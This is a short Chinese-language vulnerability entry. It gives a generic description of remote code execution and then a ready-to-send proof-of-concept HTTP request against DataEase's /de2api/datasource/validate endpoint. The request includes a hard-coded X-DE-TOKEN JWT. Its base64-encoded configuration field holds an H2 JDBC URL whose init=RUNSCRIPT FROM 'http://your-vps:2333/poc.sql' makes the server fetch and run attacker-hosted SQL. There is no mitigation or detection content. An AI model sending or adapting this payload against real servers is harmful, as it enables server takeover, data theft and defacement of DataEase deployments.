漏洞描述
远程代码执行漏洞是指攻击者通过某些漏洞在服务器上执行任意代码,这通常是由于应用程序对外部输入的验证不足或处理不当造成的。攻击者可以利用这个漏洞上传恶意代码或直接通过HTTP请求发送恶意代码,从而控制服务器,进行包括数据窃取、网站篡改、服务器资源滥用等在内的多种恶意行为。
DataEase Postgresql 后台远程代码执行漏洞
PoC代码
POST /de2api/datasource/validate HTTP/1.1
Host:
Accept-Encoding: gzip, deflate, br, zstd
sec-ch-ua: "Google Chrome";v="135", "Not-A.Brand";v="8", "Chromium";v="135"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/135.0.0.0 Safari/537.36
Accept: application/json, text/plain, */*
X-DE-TOKEN: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1aWQiOjEsIm9pZCI6MX0.a5QYOfZDYlhAy-
zUMYzKBBvCUs1ogZhjwKV5SBTECt8
Accept-Language: zh-CN
Sec-Fetch-Dest: empty
sec-ch-ua-mobile: ?0
Sec-Fetch-Site: same-origin
sec-ch-ua-platform: "Windows"
Content-Type: application/json
Sec-Fetch-Mode: cors
Content-Length: 821
{
"id": "",
"name": "11",
"description": "",
"type": "h2",
"apiConfiguration": [],
"paramsConfiguration": [],
"enableDataFill": false,
"configuration":
"eyJkYXRhQmFzZSI6IiIsImpkYmMiOiJqZGJjOmgyOm1lbTp0ZXN0ZGI7VFJBQ0VfTEVWRUxfU1lTVEVNX09VVD0
zO2luaXQ9UlVuU0NSSVBUIEZST00gJ2h0dHA6Ly95b3VyLXZwczoyMzMzL3BvYy5zcWwnIiwidXJsVHlwZSI6Imp
kYmNVcmwiLCJzc2hUeXBlIjoicGFzc3dvcmQiLCJleHRyYVBhcmFtcyI6IiIsInVzZXJuYW1lIjoiMTIzIiwicGF
zc3dvcmQiOiIxMjMiLCJob3N0IjoiIiwiYXV0aE1ldGhvZCI6IiIsInBvcnQiOjAsImluaXRpYWxQb29sU2l6ZSI
6NSwibWluUG9vbFNpemUiOjUsIm1heFBvb2xTaXplIjo1LCJxdWVyeVRpbWVvdXQiOjMwfQ(""
}